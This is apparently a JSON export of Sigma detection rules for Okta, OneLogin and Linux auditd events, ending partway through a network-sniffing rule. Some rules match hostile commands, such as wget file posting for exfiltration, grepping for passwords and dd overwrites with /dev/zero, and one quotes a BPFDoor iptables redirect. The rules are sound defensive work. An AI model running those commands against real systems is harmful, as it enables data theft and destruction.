    "content": "title: Okta Identity Provider Created\nid: 969c7590-8c19-4797-8c1b-23155de6e7ac\nstatus: test\ndescription: Detects when a new identity provider is created for Okta.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.001\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'system.idp.lifecycle.create'\n    condition: selection\nfalsepositives:\n    - When an admin creates a new, authorised identity provider.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_mfa_reset_or_deactivated.yml",
    "content": "title: Okta MFA Reset or Deactivated\nid: 50e068d7-1e6b-4054-87e5-0a592c40c7e0\nstatus: test\ndescription: Detects an attempt at deactivating or resetting MFA.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-21\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1556.006\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - user.mfa.factor.deactivate\n            - user.mfa.factor.reset_all\n    condition: selection\nfalsepositives:\n    - If an MFA reset or deactivation was performed by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml",
    "content": "title: Okta Network Zone Deactivated or Deleted\nid: 9f308120-69ed-4506-abde-ac6da81f4310\nstatus: test\ndescription: Detects when a Network Zone is deactivated or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - zone.deactivate\n            - zone.delete\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_new_behaviours_admin_console.yml",
    "content": "title: Okta New Admin Console Behaviours\nid: a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9\nstatus: test\ndescription: Detects when Okta identifies new activity in the Admin Console.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\nmodified: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection_event:\n        eventtype: 'policy.evaluate_sign_on'\n        target.displayname: 'Okta Admin Console'\n    selection_positive:\n        - debugcontext.debugdata.behaviors|contains: 'POSITIVE'\n        - debugcontext.debugdata.logonlysecuritydata|contains: 'POSITIVE'\n    condition: all of selection_*\nfalsepositives:\n    - When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual.\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_password_in_alternateid_field.yml",
    "content": "title: Potential Okta Password in AlternateID Field\nid: 91b76b84-8589-47aa-9605-c837583b82a9\nstatus: test\ndescription: |\n    Detects when a user has potentially entered their password into the\n    username field, which will cause the password to be retained in log files.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data\n    - https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm\nauthor: kelnage\ndate: 2023-04-03\nmodified: 2023-10-25\ntags:\n    - attack.credential-access\n    - attack.t1552\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        legacyeventtype: 'core.user_auth.login_failed'\n    filter_main:\n        # Okta service account names start with 0oa\n        # Email addresses are the default format for Okta usernames, so attempt\n        # to exclude alternateIds that look like valid emails\n        # If your Okta configuration uses different character restrictions, you\n        # will need to update this regular expression to reflect that or disable the rule for your environment\n        # Possible false negatives are failed login attempts with a password that looks like a valid email address\n        actor.alternateid|re: '(^0oa.*|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,10})'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_policy_modified_or_deleted.yml",
    "content": "title: Okta Policy Modified or Deleted\nid: 1667a172-ed4c-463c-9969-efd92195319a\nstatus: test\ndescription: Detects when an Okta policy is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - policy.lifecycle.update\n            - policy.lifecycle.delete\n    condition: selection\nfalsepositives:\n    - Okta Policies being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/identity/okta/okta_policy_rule_modified_or_deleted.yml",
    "content": "title: Okta Policy Rule Modified or Deleted\nid: 0c97c1d3-4057-45c9-b148-1de94b631931\nstatus: test\ndescription: Detects when a Policy Rule is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - policy.rule.update\n            - policy.rule.delete\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_security_threat_detected.yml",
    "content": "title: Okta Security Threat Detected\nid: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0\nstatus: test\ndescription: Detects when a security threat is detected in Okta.\nreferences:\n    - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: security.threat.detected\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_suspicious_activity_enduser_report.yml",
    "content": "title: Okta Suspicious Activity Reported by End-user\nid: 07e97cc6-aed1-43ae-9081-b3470d2367f1\nstatus: test\ndescription: Detects when an Okta end-user reports activity by their account as being potentially suspicious.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.resource-development\n    - attack.t1586.003\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'user.account.report_suspicious_activity_by_enduser'\n    condition: selection\nfalsepositives:\n    - If an end-user incorrectly identifies normal activity as suspicious.\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_unauthorized_access_to_app.yml",
    "content": "title: Okta Unauthorized Access to App\nid: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657\nstatus: test\ndescription: Detects when unauthorized access to an app occurs.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        displaymessage: User attempted unauthorized access to app\n    condition: selection\nfalsepositives:\n    - The user might have believed that they had access.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_user_account_locked_out.yml",
    "content": "title: Okta User Account Locked Out\nid: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a\nstatus: test\ndescription: Detects when a user account is locked out.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        displaymessage: Max sign in attempts exceeded\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_user_created.yml",
    "content": "title: New Okta User Created\nid: b6c718dd-8f53-4b9f-98d8-93fdca966969\nstatus: test\ndescription: Detects new user account creation\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\nreferences:\n    - https://developer.okta.com/docs/reference/api/event-types/\ntags:\n    - attack.credential-access\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        eventtype: 'user.lifecycle.create'\n    condition: selection\nfalsepositives:\n    - Legitimate and authorized user creation\nlevel: informational\n"
  },
  {
    "path": "rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml",
    "content": "title: Okta User Session Start Via An Anonymising Proxy Service\nid: bde30855-5c53-4c18-ae90-1ff79ebc9578\nstatus: test\ndescription: Detects when an Okta user session starts where the user is behind an anonymising proxy service.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nauthor: kelnage\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'user.session.start'\n        securitycontext.isproxy: 'true'\n    condition: selection\nfalsepositives:\n    - If a user requires an anonymising proxy due to valid justifications.\nlevel: high\n"
  },
  {
    "path": "rules/identity/onelogin/onelogin_assumed_another_user.yml",
    "content": "title: OneLogin User Assumed Another User\nid: 62fff148-278d-497e-8ecd-ad6083231a35\nstatus: test\ndescription: Detects when a user assumed another user account.\nreferences:\n    - https://developers.onelogin.com/api-docs/1/events/event-resource\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: onelogin\n    service: onelogin.events\ndetection:\n    selection:\n        event_type_id: 3\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/identity/onelogin/onelogin_user_account_locked.yml",
    "content": "title: OneLogin User Account Locked\nid: a717c561-d117-437e-b2d9-0118a7035d01\nstatus: test\ndescription: Detects when a user account is locked or suspended.\nreferences:\n    - https://developers.onelogin.com/api-docs/1/events/event-resource/\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: onelogin\n    service: onelogin.events\ndetection:\n    selection1: # Locked via API\n        event_type_id: 532\n    selection2: # Locked via API\n        event_type_id: 553\n    selection3: # Suspended via API\n        event_type_id: 551\n    condition: 1 of selection*\nfalsepositives:\n    - System may lock or suspend user accounts.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_binary_padding.yml",
    "content": "title: Binary Padding - Linux\nid: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba\nstatus: test\ndescription: |\n    Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\n    This rule detects the use of dd and truncate to add junk data to a file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md\nauthor: Igor Fits, oscd.community\ndate: 2020-10-13\nmodified: 2023-05-03\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_execve:\n        type: 'EXECVE'\n    keywords_truncate:\n        '|all':\n            - 'truncate'\n            - '-s'\n    keywords_dd:\n        '|all':\n            - 'dd'\n            - 'if='\n    keywords_filter:\n        - 'of='\n    condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter))\nfalsepositives:\n    - Unknown\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: Pad Binary to Change Hash - Linux/macOS dd\n      technique: T1027.001\n      atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml",
    "content": "title: Bpfdoor TCP Ports Redirect\nid: 70b4156e-50fc-4523-aa50-c9dddf1993fc\nstatus: test\ndescription: |\n    All TCP traffic on a particular port from the attacker host is routed to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\n    The traffic looks like encrypted SSH communication going to TCP port 22, but in reality it is redirected to the shell port once it hits the iptables rule, which applies to the attacker host only.\nreferences:\n    - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n    - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nauthor: Rafal Piasecki\ndate: 2022-08-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd:\n        type: 'EXECVE'\n        a0|endswith: 'iptables'\n        a1: '-t'\n        a2: 'nat'\n    keywords:\n        - '--to-ports 42'\n        - '--to-ports 43'\n    condition: cmd and keywords\nfalsepositives:\n    - Legitimate ports redirect\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml",
    "content": "title: Linux Capabilities Discovery\nid: fe10751f-1995-40a5-aaa2-c97ccb4123fe\nstatus: test\ndescription: Detects attempts to discover the files with setuid/setgid capability on them. That would allow an adversary to escalate their privileges.\nreferences:\n    - https://man7.org/linux/man-pages/man8/getcap.8.html\n    - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/\n    - https://mn3m.info/posts/suid-vs-capabilities/\n    - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099\nauthor: 'Pawel Mazur'\ndate: 2021-11-28\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1083\n    - attack.t1548\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: getcap\n        a1: '-r'\n        a2: '/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml",
    "content": "title: File Time Attribute Change - Linux\nid: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b\nstatus: test\ndescription: Detects file time attribute changes used to hide new files or changes to existing files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: 'EXECVE'\n    touch:\n        - 'touch'\n    selection2:\n        - '-t'\n        - '-acmr'\n        - '-d'\n        - '-r'\n    condition: execve and touch and selection2\nfalsepositives:\n    - Unknown\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Set a file's access timestamp\n      technique: T1070.006\n      atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810\n    - type: atomic-red-team\n      name: Set a file's modification timestamp\n      technique: T1070.006\n      atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52\n    - type: atomic-red-team\n      name: Modify file timestamps using reference file\n      technique: T1070.006\n      atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml",
    "content": "title: Remove Immutable File Attribute - Auditd\nid: a5b977d6-8a81-4475-91b9-49dbfcd941f7\nstatus: test\ndescription: Detects removal of the immutable file attribute.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-09-23\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains: 'chattr'\n        a1|contains: '-i'\n    condition: selection\nfalsepositives:\n    - Administrator interacting with immutable files (e.g. backups).\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Remove immutable file attribute\n      technique: T1222.002\n      atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml",
    "content": "title: Clipboard Collection with Xclip Tool - Auditd\nid: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf\nstatus: test\ndescription: |\n  Detects attempts to collect data stored in the clipboard from users with the usage of the xclip tool.\n  Xclip has to be installed.\n  Use of this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.\nreferences:\n    - https://linux.die.net/man/1/xclip\n    - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/\nauthor: 'Pawel Mazur'\ndate: 2021-09-24\nmodified: 2022-11-26\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xclip\n        a1:\n            - '-selection'\n            - '-sel'\n        a2:\n            - clipboard\n            - clip\n        a3: '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml",
    "content": "title: Clipboard Collection of Image Data with Xclip Tool\nid: f200dc3f-b219-425d-a17e-c38467364816\nstatus: test\ndescription: |\n  Detects attempts to collect image data stored in the clipboard from users with the usage of the xclip tool.\n  Xclip has to be installed.\n  Use of this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.\nreferences:\n    - https://linux.die.net/man/1/xclip\nauthor: 'Pawel Mazur'\ndate: 2021-10-01\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xclip\n        a1:\n            - '-selection'\n            - '-sel'\n        a2:\n            - clipboard\n            - clip\n        a3: '-t'\n        a4|startswith: 'image/'\n        a5: '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_coinminer.yml",
    "content": "title: Possible Coin Miner CPU Priority Param\nid: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed\nstatus: test\ndescription: Detects command line parameter very often used with coin miners\nreferences:\n    - https://xmrig.com/docs/miner/command-line-options\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-09\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd1:\n        a1|startswith: '--cpu-priority'\n    cmd2:\n        a2|startswith: '--cpu-priority'\n    cmd3:\n        a3|startswith: '--cpu-priority'\n    cmd4:\n        a4|startswith: '--cpu-priority'\n    cmd5:\n        a5|startswith: '--cpu-priority'\n    cmd6:\n        a6|startswith: '--cpu-priority'\n    cmd7:\n        a7|startswith: '--cpu-priority'\n    condition: 1 of cmd*\nfalsepositives:\n    - Other tools that use a --cpu-priority flag\nlevel: critical\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_data_compressed.yml",
    "content": "title: Data Compressed\nid: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee\nstatus: test\ndescription: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-07-28\ntags:\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection1:\n        type: 'execve'\n        a0: 'zip'\n    selection2:\n        type: 'execve'\n        a0: 'gzip'\n        a1: '-k'\n    selection3:\n        type: 'execve'\n        a0: 'tar'\n        a1|contains: '-c'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate use of archiving tools by legitimate user.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml",
    "content": "title: Data Exfiltration with Wget\nid: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc\nstatus: test\ndescription: |\n    Detects attempts to post a file with the usage of the wget utility.\n    An adversary can bypass permission restrictions through a misconfigured sudo permission for the wget utility, which could allow them to read files like /etc/shadow.\nreferences:\n    - https://linux.die.net/man/1/wget\n    - https://gtfobins.github.io/gtfobins/wget/\nauthor: 'Pawel Mazur'\ndate: 2021-11-18\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: wget\n        a1|startswith: '--post-file='\n    condition: selection\nfalsepositives:\n    - Legitimate usage of wget utility to post a file\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml",
    "content": "title: Overwriting the File with Dev Zero or Null\nid: 37222991-11e9-4b6d-8bdf-60fbe48f753e\nstatus: stable\ndescription: Detects overwriting (effectively wiping/deleting) of a file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-10-23\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains: 'dd'\n        a1|contains:\n            - 'if=/dev/null'\n            - 'if=/dev/zero'\n    condition: selection\nfalsepositives:\n    - Appending null bytes to files.\n    - Legitimate overwrite of files.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml",
    "content": "title: File or Folder Permissions Change\nid: 74c01ace-0152-4094-8ae2-6fd776dd43e5\nstatus: test\ndescription: Detects file and folder permission changes.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-09-23\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains:\n            - 'chmod'\n            - 'chown'\n    condition: selection\nfalsepositives:\n    - User interacting with files permissions (normal/daily behaviour).\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml",
    "content": "title: Credentials In Files - Linux\nid: df3fcaea-2715-4214-99c5-0056ea59eb35\nstatus: test\ndescription: 'Detecting attempts to extract passwords with grep'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2023-04-30\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n    keywords:\n        '|all':\n            - 'grep'\n            - 'password'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml",
    "content": "title: Hidden Files and Directories\nid: d08722cd-3d09-449a-80b4-83ea2d9d4616\nstatus: test\ndescription: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: 'Pawel Mazur'\ndate: 2021-09-06\nmodified: 2025-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_commands:\n        type: 'EXECVE'\n        a0:\n            - 'mkdir'\n            - 'nano'\n            - 'touch'\n            - 'vi'\n            - 'vim'\n    selection_arguments:\n        - a1|re: '(^|\\/)\\.[^.\\/]'\n        - a2|re: '(^|\\/)\\.[^.\\/]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml",
    "content": "title: Steganography Hide Zip Information in Picture File\nid: 45810b50-7edc-42ca-813b-bdac02fb946b\nstatus: test\ndescription: Detects appending of a zip file to an image file\nreferences:\n    - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\nauthor: 'Pawel Mazur'\ndate: 2021-09-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    commands:\n        type: EXECVE\n        a0: cat\n    a1:\n        a1|endswith:\n            - '.jpg'\n            - '.png'\n    a2:\n        a2|endswith: '.zip'\n    condition: commands and a1 and a2\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml",
    "content": "title: Masquerading as Linux Crond Process\nid: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0\nstatus: test\ndescription: |\n  Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\n  Several different variations of this technique have been observed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'execve'\n        a0: 'cp'\n        a1: '/bin/sh'\n        a2|endswith: '/crond'\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml",
    "content": "title: Modify System Firewall\nid: 323ff3f5-0013-4847-bbd4-250b5edb62cc\nrelated:\n    - id: 53059bc0-1472-438b-956a-7508a94a91f0\n      type: similar\nstatus: test\ndescription: |\n    Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\n    Detection rules that match only on the disabling of firewalls will miss this.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html\n    - https://blog.aquasec.com/container-security-tnt-container-attack\n    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking\nauthor: IAI\ndate: 2023-03-06\nmodified: 2025-10-12\ntags:\n    - attack.t1562.004\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection1:\n        type: 'EXECVE'\n        a0: 'iptables'\n        a1|contains: 'DROP'\n    selection2:\n        type: 'EXECVE'\n        a0: 'firewall-cmd'\n        a1|contains: 'remove'\n    selection3:\n        type: 'EXECVE'\n        a0: 'ufw'\n        a1|contains: 'delete'\n    selection4:\n        type: 'EXECVE'\n        a0: 'nft'\n        a1|contains:\n            - 'delete'\n            - 'flush'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml",
    "content": "title: Network Sniffing - Linux\nid: f4d3748a-65d1-4806-bd23-e25728081d01\nstatus: test\ndescription: |\n  Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\n  An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2022-12-18\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_1:\n        type: 'execve'\n        a0: 'tcpdump'\n        a1: '-c'\n        a3|contains: '-i'\n    selection_2:\n        type: 'execve'\n        a0: 'tshark'\n        a1: '-c'\n        a3: '-i'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrator or user uses network sniffing tool for legitimate 